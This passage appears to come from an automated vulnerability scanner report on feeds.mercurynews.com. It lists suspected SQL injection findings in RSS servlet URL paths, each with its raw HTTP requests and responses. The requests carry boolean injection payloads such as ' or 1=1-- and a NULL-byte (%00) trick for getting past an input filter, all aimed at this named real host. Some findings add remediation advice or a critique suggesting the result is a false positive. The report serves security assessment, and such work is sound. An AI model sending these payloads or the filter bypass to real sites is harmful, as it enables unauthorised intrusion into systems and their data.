H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d2--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:08 GMT
Content-Length: 0
Connection: close


1.42. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200760.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200760.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 33757705'%20or%201%3d1--%20 and 33757705'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d1--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d2--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.43. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200764.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 93704237'%20or%201%3d1--%20 and 93704237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi93704237'%20or%201%3d1--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi93704237'%20or%201%3d2--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:48 GMT
Date: Tue, 07 Dec 2010 23:19:48 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.44. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200764.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200764.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:10 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200764.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:20:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:12 GMT
Content-Length: 11500
Connection: close
Set-Cookie: JSESSIONID=MIELIUOSWI45ICUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.45. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:31 GMT
Content-Length: 0
Connection: close


1.46. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20373858'%20or%201%3d1--%20 and 20373858'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d1--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:35 GMT
Connection: close

...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d2--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:35 GMT
Content-Length: 0
Connection: close


1.47. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200765.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200765.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Content-Length: 5986
Connection: close
Set-Cookie: JSESSIONID=HHM2QH2YXU3WICUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.48. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200769.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200769.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 12899183'%20or%201%3d1--%20 and 12899183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d1--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:16 GMT
Connection: close

...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d2--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:17 GMT
Content-Length: 0
Connection: close


1.49. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200772.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 84226288'%20or%201%3d1--%20 and 84226288'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi84226288'%20or%201%3d1--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:13 GMT
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 424
Connection: close

...[SNIP]...

Request 2

GET /mngi84226288'%20or%201%3d2--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close

...[SNIP]...

1.50. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200772.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close

...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:31 GMT
Content-Length: 0
Connection: close


1.51. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200774.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200774.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20519805'%20or%201%3d1--%20 and 20519805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d1--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:00 GMT
Connection: close

...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d2--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:00 GMT
Content-Length: 0
Connection: close


1.52. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200775.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200775.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200775.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200775.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Content-Length: 9151
Connection: close
Set-Cookie: JSESSIONID=N1KD1P1UCQUPUCUUCAJSFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.53. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200776.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:22 GMT
Connection: close

...[SNIP]...

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:23 GMT
Date: Tue, 07 Dec 2010 23:20:23 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.54. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200776.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

In the exchange recorded below, neither response is an application error message. Response 1, to 568%00', is an HTTP 400 with the 34-byte body "Bad Request (Invalid URL)" and no Server or application header at all, so the URL was rejected before any servlet ran. Response 2, to 568%00'', is a 200 with an empty body (Content-Length: 0) from the IIS/5.0 ATG host. The "error message disappearing" is therefore a change in which layer handled the request, not evidence that a second quote balanced a string literal inside a SQL statement. The report also does not include the request without %00 that the scanner says was blocked, so the bypass claim cannot be verified from the data shown. To confirm, send 568', 568'' and 568%00' several times each and compare status, Server header and body only between responses from the same back end.

Remediation detail

NULL byte bypasses typically arise when the application is fronted by a web application firewall (WAF) or input filter written in native code, where a string ends at the first NULL byte: the filter stops scanning at the decoded %00 and never sees the characters after it, while the application runtime, which tracks string length explicitly, processes the whole value. Fix the actual vulnerability in the application code (bind the value with a parameterised query rather than concatenating it), reject requests whose decoded path contains a NULL byte, and if appropriate ask your WAF vendor to provide a fix for the NULL byte handling.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
